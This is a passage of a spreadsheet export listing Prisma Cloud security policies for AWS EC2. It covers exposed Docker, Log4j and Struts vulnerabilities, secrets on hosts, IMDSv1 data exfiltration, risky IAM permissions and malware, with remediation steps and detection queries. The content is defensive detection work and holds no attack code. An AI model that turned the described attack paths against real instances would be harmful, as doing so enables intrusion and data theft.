        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1782" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1782" t="inlineStr">
        <is>
          <t>Authorization bypass risk due to a publicly exposed AWS EC2 instance with an unauthorized Docker API access vulnerability (Docker, CVE-2024-41110)</t>
        </is>
      </c>
      <c r="L1782" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1782" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1782" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1782" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1782" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1782" t="inlineStr"/>
      <c r="R1782" t="inlineStr"/>
      <c r="S1782" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1782" t="b">
        <v>0</v>
      </c>
      <c r="U1782" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1782" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1782" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have a known exploitable Authorization bypass vulnerability affecting Docker (CVE-2024-41110).
CVE-2024-41110 is a critical vulnerability in Docker that allows attackers to bypass authorization plugins (AuthZ) through specially crafted API requests, potentially leading to unauthorized actions and privilege escalation. This vulnerability affects Docker Engine versions 19.03.x and later, including Docker Desktop versions up to v4.32.0, specifically for users utilizing AuthZ plugins for access control.
Successful exploitation of CVE-2024-41110 allows attackers to bypass authorization controls, enabling them to execute unauthorized Docker commands and potentially escalate privileges. The fact that the AWS EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Docker (CVE-2024-41110) vulnerability and the public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X1782" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict access to the AWS EC2 instance by configuring Security group rules
1. Sign in to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does not exist.
8. Click 'Save rules' to apply the changes
[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2024-41110
2. Perform thorough backups of software configurations and data before applying updates
3. Refer to the given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2024-41110</t>
        </is>
      </c>
      <c r="Y1782" t="inlineStr"/>
      <c r="Z1782" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-41110'))</t>
        </is>
      </c>
      <c r="AA1782" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1782" t="inlineStr">
        <is>
          <t>2024-09-27 06:57:39</t>
        </is>
      </c>
      <c r="AC1782" t="inlineStr"/>
      <c r="AD1782" t="b">
        <v>1</v>
      </c>
      <c r="AE1782" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1782" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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82" t="inlineStr">
        <is>
          <t>698f6478-7fbb-4fc6-8cf0-e47786fe67e4</t>
        </is>
      </c>
      <c r="AI1782" t="inlineStr">
        <is>
          <t>ab50fb34-f4fd-4278-906a-1c470b240bfb</t>
        </is>
      </c>
      <c r="AJ1782" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1782" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1783">
      <c r="A1783" t="inlineStr"/>
      <c r="B1783" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1783" s="2" t="inlineStr"/>
      <c r="D1783" t="n">
        <v>1</v>
      </c>
      <c r="E1783" t="n">
        <v>0</v>
      </c>
      <c r="F1783" t="n">
        <v>0</v>
      </c>
      <c r="G1783" t="b">
        <v>1</v>
      </c>
      <c r="H17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783" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1783" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1783" t="inlineStr">
        <is>
          <t>Secrets exposure risk due to publicly exposed and vulnerable AWS EC2 instance containing secrets</t>
        </is>
      </c>
      <c r="L1783" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1783" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1783" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1783" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1783" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1783" t="inlineStr"/>
      <c r="R1783" t="inlineStr"/>
      <c r="S1783" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1783" t="b">
        <v>0</v>
      </c>
      <c r="U1783" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1783" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1783" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed and vulnerable AWS EC2 instances containing secrets.
A publicly exposed and vulnerable AWS EC2 instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. An AWS EC2 instance containing secrets would allow attackers to escalate their permissions.
Immediate attention is required to remediate critical and high vulnerabilities, restrict public exposure, and remove secrets reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1783"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[SECRETS_EXPOSURE]
Including sensitive secrets in a host filesystem poses significant security risks. It can lead to privilege escalation, unauthorised access, and application disruptions. Maintain a secure environment by removing secrets from hosts.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1783" t="inlineStr"/>
      <c r="Z1783" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE severity greater than or equal to high) AND has : (secret WHERE secret.type in ('AWS Access Key ID', 'AWS Secret Key', 'AWS MWS Auth Token'))</t>
        </is>
      </c>
      <c r="AA1783" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1783" t="inlineStr">
        <is>
          <t>2024-09-02 06:33:51</t>
        </is>
      </c>
      <c r="AC1783" t="inlineStr"/>
      <c r="AD1783" t="b">
        <v>1</v>
      </c>
      <c r="AE1783" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1783" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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783" t="inlineStr">
        <is>
          <t>491e6c2b-80f2-4ffd-aaeb-6796d0df8e10</t>
        </is>
      </c>
      <c r="AI1783" t="inlineStr">
        <is>
          <t>28383da7-b8ee-436a-a18d-9101ac2b2a68</t>
        </is>
      </c>
      <c r="AJ1783" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1783" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1784">
      <c r="A1784" t="inlineStr"/>
      <c r="B1784" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1784" s="2" t="inlineStr"/>
      <c r="D1784" t="inlineStr"/>
      <c r="E1784" t="inlineStr"/>
      <c r="F1784" t="inlineStr"/>
      <c r="G1784" t="b">
        <v>1</v>
      </c>
      <c r="H17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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1784" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1784" t="inlineStr">
        <is>
          <t>Potential indication of data exfiltration activity through a publicly exposed and vulnerable AWS EC2 instance with s3:GetObject and s3:ListBucket permissions and not configured with Metadata Service v2 (IMDSv2)</t>
        </is>
      </c>
      <c r="L1784" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE,DATA_EXFILTRATION</t>
        </is>
      </c>
      <c r="M1784" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1784" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1784" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1784" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1784" t="inlineStr"/>
      <c r="R1784" t="inlineStr"/>
      <c r="S1784" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1784" t="b">
        <v>0</v>
      </c>
      <c r="U1784" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1784" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1784" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that pose critical security risks due to their public exposure, critical or high vulnerabilities, misconfigurations, and detection of high-volume data transfer activity.
Critical or high vulnerabilities on publicly exposed EC2 instances pose significant security risks as attackers can exploit the instances remotely to gain access. Moreover, EC2 instances having s3:GetObject and s3:ListBucket permissions and access to the IMDSv1 instance metadata service endpoint introduce additional risks. These instances can potentially access sensitive metadata, including temporary security credentials that the attackers can leverage to access the associated S3 buckets and extract sensitive data from them.
Furthermore, the observation of high-volume data transfer activity on these exploitable EC2 instances can serve as a strong indicator of a potential attack or compromise. Such activity suggests that unauthorized data exfiltration or malicious activities may have taken place.
Immediate attention is required to restrict internet exposure and investigate the high volume data transfer activity to determine if any sensitive data was compromised. Remediate the critical or high vulnerabilities. It is recommended to configure Instance Metadata Service v2 (IMDSv2) instead of IMDSv1 to prevent unauthorized access to sensitive metadata. Additionally, ensure that only the least privileges required for the EC2 instance are granted and remove any unwanted permissions assigned.</t>
        </is>
      </c>
      <c r="X178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[MISCONFIGURATION]
1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Refer 'Configure instance metadata options for existing instances' section from follwoing URL
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html
NOTE: Make a precaution before you enforce the use of IMDSv2, as applications or agents that use IMDSv1 for instance metadata access will break.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84" t="inlineStr"/>
      <c r="Z1784" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2)','EC2 with IAM role attached has s3:GetObject and s3:ListBucket permissions','Unusual high volume data transfer activity from a monitored cloud account') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1784" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1784" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1784" t="inlineStr"/>
      <c r="AD1784" t="b">
        <v>1</v>
      </c>
      <c r="AE1784" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1784" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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4" t="inlineStr">
        <is>
          <t>f67668c3-3b48-405c-bc4e-29524c9089f2</t>
        </is>
      </c>
      <c r="AI1784" t="inlineStr">
        <is>
          <t>1330d2b8-d82e-4cff-9cb6-ac2549d75c9b</t>
        </is>
      </c>
      <c r="AJ1784" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1784" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1785">
      <c r="A1785" t="inlineStr"/>
      <c r="B1785" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1785" s="2" t="inlineStr"/>
      <c r="D1785" t="n">
        <v>6</v>
      </c>
      <c r="E1785" t="n">
        <v>0</v>
      </c>
      <c r="F1785" t="n">
        <v>0</v>
      </c>
      <c r="G1785" t="b">
        <v>1</v>
      </c>
      <c r="H17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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1785" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1785" t="inlineStr">
        <is>
          <t>Unauthorized access or account actions risk due to a publicly exposed and vulnerable AWS EC2 instance with sensitive IAM 'write' permissions</t>
        </is>
      </c>
      <c r="L1785" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1785" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1785" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1785" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1785" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1785" t="inlineStr"/>
      <c r="R1785" t="inlineStr"/>
      <c r="S1785" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1785" t="b">
        <v>0</v>
      </c>
      <c r="U1785" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1785" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1785" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and risky IAM write permissions.
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The risky IAM write permissions on the instance further help the attackers to perform unauthorized actions in the cloud account.
This policy checks for the following risky IAM write permissions:
'iam:AddClientIDToOpenIDConnectProvider', 'iam:AddRoleToInstanceProfile', 'iam:AddUserToGroup', 'iam:ChangePassword', 'iam:CreateAccessKey', 'iam:CreateAccountAlias', 'iam:CreateGroup', 'iam:CreateInstanceProfile', 'iam:CreateLoginProfile', 'iam:CreateOpenIDConnectProvider', 'iam:CreateRole', 'iam:CreateSAMLProvider', 'iam:CreateServiceLinkedRole', 'iam:CreateServiceSpecificCredential', 'iam:CreateUser', 'iam:CreateVirtualMFADevice', 'iam:DeactivateMFADevice', 'iam:DeleteAccessKey', 'iam:DeleteAccountAlias', 'iam:DeleteGroup', 'iam:DeleteInstanceProfile', 'iam:DeleteLoginProfile', 'iam:DeleteOpenIDConnectProvider', 'iam:DeleteRole', 'iam:DeleteSAMLProvider', 'iam:DeleteSSHPublicKey', 'iam:DeleteServerCertificate', 'iam:DeleteServiceLinkedRole', 'iam:DeleteServiceSpecificCredential', 'iam:DeleteSigningCertificate', 'iam:DeleteUser', 'iam:DeleteVirtualMFADevice', 'iam:EnableMFADevice', 'iam:PassRole', 'iam:RemoveClientIDFromOpenIDConnectProvider', 'iam:RemoveRoleFromInstanceProfile', 'iam:RemoveUserFromGroup', 'iam:ResetServiceSpecificCredential', 'iam:ResyncMFADevice', 'iam:SetSecurityTokenServicePreferences', 'iam:UpdateAccessKey', 'iam:UpdateAccountPasswordPolicy', 'iam:UpdateGroup', 'iam:UpdateLoginProfile', 'iam:UpdateOpenIDConnectProviderThumbprint', 'iam:UpdateRole', 'iam:UpdateRoleDescription', 'iam:UpdateSAMLProvider', 'iam:UpdateSSHPublicKey', 'iam:UpdateServerCertificate', 'iam:UpdateServiceSpecificCredential', 'iam:UpdateSigningCertificate', 'iam:UpdateUser', 'iam:UploadSSHPublicKey', 'iam:UploadServerCertificate', 'iam:UploadSigningCertificate'
Immediate attention is required to review the risky write permissions and grant only the least privileges required. Remove unwanted permissions assigned to the EC2 instances. Remediate critical and high vulnerabilities, and restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X178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85" t="inlineStr"/>
      <c r="Z1785" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 Instance with IAM write permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1785" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1785" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1785" t="inlineStr"/>
      <c r="AD1785" t="b">
        <v>1</v>
      </c>
      <c r="AE1785" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1785" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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5" t="inlineStr">
        <is>
          <t>62c86dfe-9201-46d2-94b7-27f55b731b8e</t>
        </is>
      </c>
      <c r="AI1785" t="inlineStr">
        <is>
          <t>bb0d5351-bce1-427b-bcf4-e85d5194ed7e</t>
        </is>
      </c>
      <c r="AJ1785" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1785" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1786">
      <c r="A1786" t="inlineStr"/>
      <c r="B1786" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1786" s="2" t="inlineStr"/>
      <c r="D1786" t="inlineStr"/>
      <c r="E1786" t="inlineStr"/>
      <c r="F1786" t="inlineStr"/>
      <c r="G1786" t="b">
        <v>1</v>
      </c>
      <c r="H17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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1786" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1786" t="inlineStr">
        <is>
          <t>Potential unauthorized domain activity on AWS EC2 instance affected by malware</t>
        </is>
      </c>
      <c r="L1786" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,MALWARE,COMMAND_AND_CONTROL</t>
        </is>
      </c>
      <c r="M1786" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1786" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1786" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1786" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1786" t="inlineStr"/>
      <c r="R1786" t="inlineStr"/>
      <c r="S1786" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1786" t="b">
        <v>0</v>
      </c>
      <c r="U1786" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1786" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1786" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are affected with malware and are connected to remote systems known for suspicious domain request activities.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If there is network connectivity with remote systems known for domain generation algorithms (DGAs) or cryptomining domain request activity on an EC2 instance, it could indicate that the instance is already under attack or has been compromised.
Immediate attention is required to remediate the malware reported for the instances as soon as possible and investigate suspicious domain request activities.</t>
        </is>
      </c>
      <c r="X1786"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1786" t="inlineStr"/>
      <c r="Z1786" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name = (('Host contains Malware' or 'Host contains Grayware') and ('DGA domain request activity' or 'Cryptomining domain request activity'))</t>
        </is>
      </c>
      <c r="AA1786" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1786" t="inlineStr">
        <is>
          <t>2023-12-08 04:25:02</t>
        </is>
      </c>
      <c r="AC1786" t="inlineStr"/>
      <c r="AD1786" t="b">
        <v>1</v>
      </c>
      <c r="AE1786" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1786" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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6" t="inlineStr">
        <is>
          <t>8bc985c0-3e20-4eb4-8408-f3321a085849</t>
        </is>
      </c>
      <c r="AI1786" t="inlineStr">
        <is>
          <t>406862c1-c730-4608-bca4-b3fc0287eb27</t>
        </is>
      </c>
      <c r="AJ1786" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1786" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1787">
      <c r="A1787" t="inlineStr"/>
      <c r="B1787" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1787" s="2" t="inlineStr"/>
      <c r="D1787" t="inlineStr"/>
      <c r="E1787" t="inlineStr"/>
      <c r="F1787" t="inlineStr"/>
      <c r="G1787" t="b">
        <v>1</v>
      </c>
      <c r="H17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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1787" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1787" t="inlineStr">
        <is>
          <t>Potential risk of remote code execution due to vulnerable Log4j and public exposure on ports 80/443 on an AWS EC2 Instance [Apache Log4j, CVE-2021-44228, CVE-2021-45046]</t>
        </is>
      </c>
      <c r="L1787" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1787" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1787" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1787" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1787" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1787" t="inlineStr"/>
      <c r="R1787" t="inlineStr"/>
      <c r="S1787" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1787" t="b">
        <v>0</v>
      </c>
      <c r="U1787" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1787" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1787" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are exposed to 80/443 ports Log4Shell vulnerabilities [Apache Log4j, CVE-2021-44228, CVE-2021-45046].
The Log4j vulnerability allows remote attackers to execute arbitrary code on a target system by exploiting a flaw in the library's handling of JNDI (Java Naming and Directory Interface) lookups. Specifically, it occurs due to improper input validation when processing user-supplied data in log messages. Attackers can craft specially crafted log messages that trigger a JNDI lookup to a malicious server controlled by them. This can lead to remote code execution on the affected system, making it a severe security issue. The fact the common web server ports 80/443 open to internet makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to restrict the public exposure of the affected AWS EC2 instance and remediate the Apache Log4j [CVE-2021-44228, CVE-2021-45046] vulnerabilities.</t>
        </is>
      </c>
      <c r="X178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ports (http/80, https/443) such that CIDR range 0.0.0.0/0 do not exists
8. Click 'Save rules' to apply the changes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
   https://nvd.nist.gov/vuln/detail/CVE-2021-45046</t>
        </is>
      </c>
      <c r="Y1787" t="inlineStr"/>
      <c r="Z1787" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0) on ports 80/443') AND with : (Vuln WHERE id IN ('CVE-2021-44228','CVE-2021-45046'))</t>
        </is>
      </c>
      <c r="AA1787" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1787" t="inlineStr">
        <is>
          <t>2023-11-10 07:02:50</t>
        </is>
      </c>
      <c r="AC1787" t="inlineStr"/>
      <c r="AD1787" t="b">
        <v>1</v>
      </c>
      <c r="AE1787" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1787" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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7" t="inlineStr">
        <is>
          <t>d87073ed-29c1-4050-aebe-9880c497b6fa</t>
        </is>
      </c>
      <c r="AI1787" t="inlineStr">
        <is>
          <t>afe2a642-ba8d-45ba-90eb-d5f293013ad4</t>
        </is>
      </c>
      <c r="AJ1787" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1787" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1788">
      <c r="A1788" t="inlineStr"/>
      <c r="B1788" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1788" s="2" t="inlineStr"/>
      <c r="D1788" t="inlineStr"/>
      <c r="E1788" t="inlineStr"/>
      <c r="F1788" t="inlineStr"/>
      <c r="G1788" t="b">
        <v>1</v>
      </c>
      <c r="H17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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1788" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1788" t="inlineStr">
        <is>
          <t>Data exfiltration risk due to malware in AWS EC2 instance with s3:GetObject &amp; s3:ListBucket permissions</t>
        </is>
      </c>
      <c r="L1788" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE,DATA_EXFILTRATION</t>
        </is>
      </c>
      <c r="M1788" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1788" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1788" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1788" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1788" t="inlineStr"/>
      <c r="R1788" t="inlineStr"/>
      <c r="S1788" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1788" t="b">
        <v>0</v>
      </c>
      <c r="U1788" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1788" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1788" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instance with s3:GetObject and s3:ListBucket permissions that are affected by malware or grayware and detection of high-volume data transfer activity.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Moreover, EC2 instances having s3:GetObject and s3:ListBucket permissions introduce additional risks. These instances can potentially access the associated S3 buckets and extract sensitive data from them.
Furthermore, the observation of high-volume data transfer activity on these exploitable EC2 instances can serve as a strong indicator of a potential attack or compromise. Such activity suggests that unauthorized data exfiltration or malicious activities may have taken place.
Immediate attention is required to remediate the malware or grayware reported for the instances as soon as possible. Additionally, ensure that only the least privileges required for the EC2 instance are granted and remove any unwanted permissions assigned.</t>
        </is>
      </c>
      <c r="X1788"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1788" t="inlineStr"/>
      <c r="Z1788" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('Host contains Malware' or 'Host contains Grayware') and ('EC2 with IAM role attached has s3:GetObject and s3:ListBucket permissions' and 'Unusual high volume data transfer activity from a monitored cloud account'))</t>
        </is>
      </c>
      <c r="AA1788" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1788" t="inlineStr">
        <is>
          <t>2023-12-08 04:25:02</t>
        </is>
      </c>
      <c r="AC1788" t="inlineStr"/>
      <c r="AD1788" t="b">
        <v>1</v>
      </c>
      <c r="AE1788" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1788" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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8" t="inlineStr">
        <is>
          <t>ab18d8ac-b5ee-4bcb-9062-37d093658514</t>
        </is>
      </c>
      <c r="AI1788" t="inlineStr">
        <is>
          <t>110cfbe8-6a07-4106-a21a-eb96922e7a93</t>
        </is>
      </c>
      <c r="AJ1788" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1788" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1789">
      <c r="A1789" t="inlineStr"/>
      <c r="B1789" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1789" s="2" t="inlineStr"/>
      <c r="D1789" t="inlineStr"/>
      <c r="E1789" t="inlineStr"/>
      <c r="F1789" t="inlineStr"/>
      <c r="G1789" t="b">
        <v>1</v>
      </c>
      <c r="H17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89" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1789" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1789" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on AWS EC2 with known exploitable vulnerability (CVE-2023-50164, Apache Struts)</t>
        </is>
      </c>
      <c r="L1789" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1789" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1789" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1789" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1789" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
